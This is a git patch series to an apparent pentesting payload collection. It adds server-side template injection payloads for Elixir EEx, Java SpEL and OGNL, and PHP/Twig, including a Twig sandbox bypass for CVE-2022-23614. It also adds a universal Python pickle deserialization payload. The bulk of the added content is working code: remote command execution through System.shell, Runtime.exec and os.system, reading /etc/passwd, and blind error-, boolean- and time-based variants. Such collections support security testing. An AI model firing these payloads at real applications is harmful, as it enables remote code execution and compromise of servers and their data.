From dac581547e529db38684e9ae93c5278ab47aa961 Mon Sep 17 00:00:00 2001 From: vladko312 Date: Sun, 22 Feb 2026 21:18:54 +0300 Subject: [PATCH 1/8] SSTI: - Added Elixir/EEx payloads - Added OGNL payloads - Clarified SpEL payloads and details - Fixed PHP Error-Based payloads - Added Twig Error-Based payload for CVE-2022-23614 Insecure Deserialization: - Improved Python payloads --- Insecure Deserialization/Python.md | 25 +++++++++ Server Side Template Injection/Elixir.md | 66 +++++++++++++++++++++++ Server Side Template Injection/Java.md | 67 +++++++++++++++++++++++- Server Side Template Injection/PHP.md | 6 +-- 4 files changed, 160 insertions(+), 4 deletions(-) create mode 100644 Server Side Template Injection/Elixir.md diff --git a/Insecure Deserialization/Python.md b/Insecure Deserialization/Python.md index 5071e80488..b29ad2c499 100644 --- a/Insecure Deserialization/Python.md +++ b/Insecure Deserialization/Python.md @@ -68,6 +68,30 @@ evil_token = b64encode(cPickle.dumps(e)) print("Your Evil Token : {}").format(evil_token) ``` +This payload uses platform-specific `os` module, so payloads generated on Windows will not work on Linux and vice versa. + +A universal payload can be created by loading `os` at runtime using eval: + +```python +import pickle +import base64 + +class RCE: + def __reduce__(self): + return eval, ("__import__('os').system('whoami')",) +pickled = pickle.dumps(RCE()) +print(base64.b64encode(pickled).decode()) +``` + +This approach allows running arbitrary python code, which allows us to use different techniques from code injection: + +```python +__import__('os').system('whoami') # Reflected RCE +getattr('', __import__('os').popen('whoami').read()) # Error-Based RCE +1 / (__include__("os").popen("id")._proc.wait() == 0) # Boolean-Based RCE +__include__("os").popen("id && sleep 5").read() # Time-Based RCE +``` + ### PyYAML YAML deserialization is the process of converting YAML-formatted data back into objects in programming languages like Python, Ruby, or Java. YAML (YAML Ain't Markup Language) is popular for configuration files and data serialization because it is human-readable and supports complex data structures. @@ -111,3 +135,4 @@ with open('exploit_unsafeloader.yml') as file: * [Python Yaml Deserialization - HackTricks - July 19, 2024](https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization) * [PyYAML Documentation - PyYAML - April 29, 2006](https://pyyaml.org/wiki/PyYAMLDocumentation) * [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13, 2021](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf) +* [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md) diff --git a/Server Side Template Injection/Elixir.md b/Server Side Template Injection/Elixir.md new file mode 100644 index 0000000000..cfe8cda1b9 --- /dev/null +++ b/Server Side Template Injection/Elixir.md @@ -0,0 +1,66 @@ +# Server Side Template Injection - Elixir + +> Server-Side Template Injection (SSTI) is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Elixir, SSTI can occur when using templating engines like EEx (Embedded Elixir), especially when user input is incorporated into templates without proper sanitization or validation. + +## Summary + +- [Templating Libraries](#templating-libraries) +- [Universal Payloads](#universal-payloads) +- [EEx](#eex) + - [EEx - Basic injections](#eex---basic-injections) + - [EEx - Retrieve /etc/passwd](#eex---retrieve-etcpasswd) + - [EEx - Remote Command execution](#eex---remote-command-execution) +- [References](#references) + +## Templating Libraries + +| Template Name | Payload Format | +|---------------|----------------| +| EEx | `<%= %>` | +| LEEx | `<%= %>` | +| HEEx | `<%= %>` | + +## Universal Payloads + +Generic code injection payloads work for many Elixir-based template engines, such as EEx, LEEx and HEEx. + +By default, only EEx can render templates from string, but it is possible to use LEEx and HEEx as replacement engines for EEx. + +To use these payloads, wrap them in the appropriate tag. + +```erlang +elem(System.shell("id"), 0) # Rendered RCE +[1, 2][elem(System.shell("id"), 0)] # Error-Based RCE +1/((elem(System.shell("id"), 1) == 0)&&1||0) # Boolean-Based RCE +elem(System.shell("id && sleep 5"), 0) # Time-Based RCE +``` + +## EEx + +[Official website](https://hexdocs.pm/eex/1.19.5/EEx.html) +> EEx stands for Embedded Elixir. + +### EEx - Basic injections + +```erlang +<%= 7 * 7 %> +``` + +### EEx - Retrieve /etc/passwd + +```erlang +<%= File.read!("/etc/passwd") %> +``` + +### EEx - Remote Command execution + +```erlang +<%= elem(System.shell("id"), 0) %> # Rendered RCE +<%= [1, 2][elem(System.shell("id"), 0)] %> # Error-Based RCE +<%= 1/((elem(System.shell("id"), 1) == 0)&&1||0) %> # Boolean-Based RCE +<%= elem(System.shell("id && sleep 5"), 0) %> # Time-Based RCE +``` + +## References + +- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md) diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md index f261d791d2..90c54ffdf6 100644 --- a/Server Side Template Injection/Java.md +++ b/Server Side Template Injection/Java.md @@ -35,6 +35,9 @@ - [SpEL - DNS Exfiltration](#spel---dns-exfiltration) - [SpEL - Session Attributes](#spel---session-attributes) - [SpEL - Command Execution](#spel---command-execution) +- [Object-Graph Navigation Language](#object-graph-navigation-language) + - [OGNL - Basic Injection](#ognl---basic-injection) + - [OGNL - Command Execution](#ognl---command-execution) - [References](#references) ## Templating Libraries @@ -46,7 +49,7 @@ | Groovy | `${ }` | | Jinjava | `{{ }}` | | Pebble | `{{ }}` | -| Spring | `*{ }` | +| SpEL | `*{ }`, `#{ }`, `${ }` | | Thymeleaf | `[[ ]]` | | Velocity | `#set($X="") $X` | @@ -367,9 +370,12 @@ ${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(val ### SpEL - Basic Injection +> SpEL has built-in templating system using #{ }, but SpEL is also commonly used for interpolation using ${ } + ```java ${7*7} ${'patt'.toString().replace('a', 'x')} +${T(java.lang.Integer).valueOf('1')} ``` ### SpEL - Retrieve Environment Variables @@ -440,6 +446,65 @@ ${pageContext.request.getSession().setAttribute("admin",true)} ${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())} ${request.getAttribute("a")} ``` +- Error-Based payload: + + ```java + ${T(java.lang.Integer).valueOf("x"+T(java.lang.String).getConstructor(T(byte[])).newInstance(T(java.lang.Runtime).getRuntime().exec("id").inputStream.readAllBytes()))} + ``` + +- Boolean-Based payload: + + ```java + ${1/((T(java.lang.Runtime).getRuntime().exec("id").waitFor()==0)?1:0)+""} + ``` + +- Time-Based payload: + + ```java + ${(T(java.lang.Runtime).getRuntime().exec("id").waitFor().equals(0)?T(java.lang.Thread).sleep(5000):0).toString()} + ``` + +## Object-Graph Navigation Language + +[Official website](https://commons.apache.org/dormant/commons-ognl/) + +> OGNL stands for Object-Graph Navigation Language; it is an expression language for getting and setting properties of Java objects, plus other extras such as list projection and selection and lambda expressions. You use the same expression for both getting and setting the value of a property. + +### OGNL - Basic Injection + +> OGNL can be used with different tags like ${ } + +```java +7*7 +'patt'.toString().replace('a', 'x') +@java.lang.Integer@valueOf('1') +``` + +### OGNL - Command Execution + +Rendered: + +```java +new String(@java.lang.Runtime@getRuntime().exec("id").getInputStream().readAllBytes()) +``` + +Error-Based: + +```java +(new String(@java.lang.Runtime@getRuntime().exec("id").getInputStream().readAllBytes()))/0 +``` + +Boolean-Based: + +```java +1/((@java.lang.Runtime@getRuntime().exec("id").waitFor()==0)?1:0)+"" +``` + +Time-Based: + +```java +((@java.lang.Runtime@getRuntime().exec("id").waitFor().equals(0))?@java.lang.Thread@sleep(5000):0) +``` ## References diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md index 11caee80a3..97be31cd6c 100644 --- a/Server Side Template Injection/PHP.md +++ b/Server Side Template Injection/PHP.md @@ -47,9 +47,7 @@ system('id') // Error-Based RCE ini_set("error_reporting", "1") // Enable verbose fatal errors for Error-Based -fopen(join("", ["Y:/A:/", shell_exec('id')]), "r") -include(join("", ["Y:/A:/", shell_exec('id')])) -join("", ["xx", shell_exec('id')])() +call_user_func(join("", ["xx", shell_exec('id')])) // Boolean-Based RCE 1 / (pclose(popen("id", "wb")) == 0) @@ -163,6 +161,8 @@ $output = $twig > render ( {{_self.env.registerUndefinedFilterCallback("shell_exec")}}{{1/(_self.env.getFilter("id && echo UniqueString")|trim('\n') ends with "UniqueString")}} // Boolean-Based RCE <= 1.19 {{1/({"id && echo UniqueString":"shell_exec"}|map("call_user_func")|join|trim('\n') ends with "UniqueString")}} // Boolean-Based RCE >=1.41, >=2.10, >=3.0 + +{% set a = ["error_reporting", "1"]|sort("ini_set") %}{% set b = ["ob_start", "call_user_func"]|sort("call_user_func") %}{{ ["id", 0]|sort("system") }}{% set a = ["ob_end_flush", []]|sort("call_user_func_array")%} // Error-Based RCE with sandbox bypass using CVE-2022-23614 {{ 1 / (["id >>/dev/null && echo -n 1", "0"]|sort("system")|first == "0") }} // Boolean-Based RCE with sandbox bypass using CVE-2022-23614 ``` From f99fe06c2f0758668b1a98ae157dd2dc53f362f5 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 2 Mar 2026 17:45:36 +0100 Subject: [PATCH 2/8] Update Python.md to clarify payload compatibility Removed note about platform-specific payloads and added information on creating a universal payload using eval. --- Insecure Deserialization/Python.md | 2 -- 1 file changed, 2 deletions(-) diff --git a/Insecure Deserialization/Python.md b/Insecure Deserialization/Python.md index b29ad2c499..e358bcc1d9 100644 --- a/Insecure Deserialization/Python.md +++ b/Insecure Deserialization/Python.md @@ -68,8 +68,6 @@ evil_token = b64encode(cPickle.dumps(e)) print("Your Evil Token : {}").format(evil_token) ``` -This payload uses platform-specific `os` module, so payloads generated on Windows will not work on Linux and vice versa. - A universal payload can be created by loading `os` at runtime using eval: ```python From 5c487edc055a315a3792459d57b1dc952a015c9c Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 2 Mar 2026 17:52:24 +0100 Subject: [PATCH 3/8] Change title to 'Elixir Deserialization' and update content Updated the title and provided a brief overview of Server-Side Template Injection in Elixir. --- Server Side Template Injection/Elixir.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Server Side Template Injection/Elixir.md b/Server Side Template Injection/Elixir.md index cfe8cda1b9..4fc469f959 100644 --- a/Server Side Template Injection/Elixir.md +++ b/Server Side Template Injection/Elixir.md @@ -1,4 +1,4 @@ -# Server Side Template Injection - Elixir +# Elixir Deserialization > Server-Side Template Injection (SSTI) is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Elixir, SSTI can occur when using templating engines like EEx (Embedded Elixir), especially when user input is incorporated into templates without proper sanitization or validation. From 3c063a8616d97e4a6e99797f47cc397bf04a656e Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 2 Mar 2026 17:57:38 +0100 Subject: [PATCH 4/8] Fix formatting for SpEL and OGNL examples in Java.md --- Server Side Template Injection/Java.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md index 90c54ffdf6..45dc1861c2 100644 --- a/Server Side Template Injection/Java.md +++ b/Server Side Template Injection/Java.md @@ -370,7 +370,7 @@ ${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(val ### SpEL - Basic Injection -> SpEL has built-in templating system using #{ }, but SpEL is also commonly used for interpolation using ${ } +> SpEL has built-in templating system using `#{ }`, but SpEL is also commonly used for interpolation using `${ }``. ```java ${7*7} @@ -472,7 +472,7 @@ ${pageContext.request.getSession().setAttribute("admin",true)} ### OGNL - Basic Injection -> OGNL can be used with different tags like ${ } +> OGNL can be used with different tags like `${ }` ```java 7*7 From 3051fc81158e2b33bf22a7335f1971f10f48f561 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 2 Mar 2026 17:58:19 +0100 Subject: [PATCH 5/8] Fix formatting issues in SpEL section of Java.md --- Server Side Template Injection/Java.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md index 45dc1861c2..84981a8058 100644 --- a/Server Side Template Injection/Java.md +++ b/Server Side Template Injection/Java.md @@ -370,7 +370,7 @@ ${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(val ### SpEL - Basic Injection -> SpEL has built-in templating system using `#{ }`, but SpEL is also commonly used for interpolation using `${ }``. +> SpEL has built-in templating system using `#{ }`, but SpEL is also commonly used for interpolation using `${ }`. ```java ${7*7} From b60551efe9673b9d493b1a73e97fe08e0ddb68ee Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 2 Mar 2026 18:04:20 +0100 Subject: [PATCH 6/8] Fix CI/CD markdown --- Server Side Template Injection/Java.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md index 84981a8058..397ee996b8 100644 --- a/Server Side Template Injection/Java.md +++ b/Server Side Template Injection/Java.md @@ -446,6 +446,7 @@ ${pageContext.request.getSession().setAttribute("admin",true)} ${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())} ${request.getAttribute("a")} ``` + - Error-Based payload: ```java From ae9c45f47425522459d4b0902373132d781dae21 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 2 Mar 2026 18:07:33 +0100 Subject: [PATCH 7/8] Fix markdown linter --- Server Side Request Forgery/README.md | 4 ++-- Server Side Template Injection/Java.md | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 091de3b4ee..34a6bd9ed5 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -271,12 +271,12 @@ http:127.0.0.1/ ![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true) -Parsing behavior by different libraries: `http://1.1.1.1 &@2.2.2.2# @3.3.3.3/` +Parsing behavior by different libraries: `http://1.1.1.1 &@2.2.2.2# @3.3.3.3/`. * `urllib2` treats `1.1.1.1` as the destination * `requests` and browsers redirect to `2.2.2.2` * `urllib` resolves to `3.3.3.3` -* Some parsers replace http:127.0.0.1/ to http://127.0.0.1/ +* Some parsers replace `http:127.0.0.1/` to `http://127.0.0.1/` ### Bypass PHP filter_var() Function diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md index 397ee996b8..4f6d898b52 100644 --- a/Server Side Template Injection/Java.md +++ b/Server Side Template Injection/Java.md @@ -446,7 +446,7 @@ ${pageContext.request.getSession().setAttribute("admin",true)} ${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())} ${request.getAttribute("a")} ``` - + - Error-Based payload: ```java From d8e749cdc5eee963869fb660275e75474cb8a728 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 2 Mar 2026 18:23:58 +0100 Subject: [PATCH 8/8] Fix title error --- Server Side Template Injection/Elixir.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Server Side Template Injection/Elixir.md b/Server Side Template Injection/Elixir.md index 4fc469f959..cfe8cda1b9 100644 --- a/Server Side Template Injection/Elixir.md +++ b/Server Side Template Injection/Elixir.md @@ -1,4 +1,4 @@ -# Elixir Deserialization +# Server Side Template Injection - Elixir > Server-Side Template Injection (SSTI) is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Elixir, SSTI can occur when using templating engines like EEx (Embedded Elixir), especially when user input is incorporated into templates without proper sanitization or validation.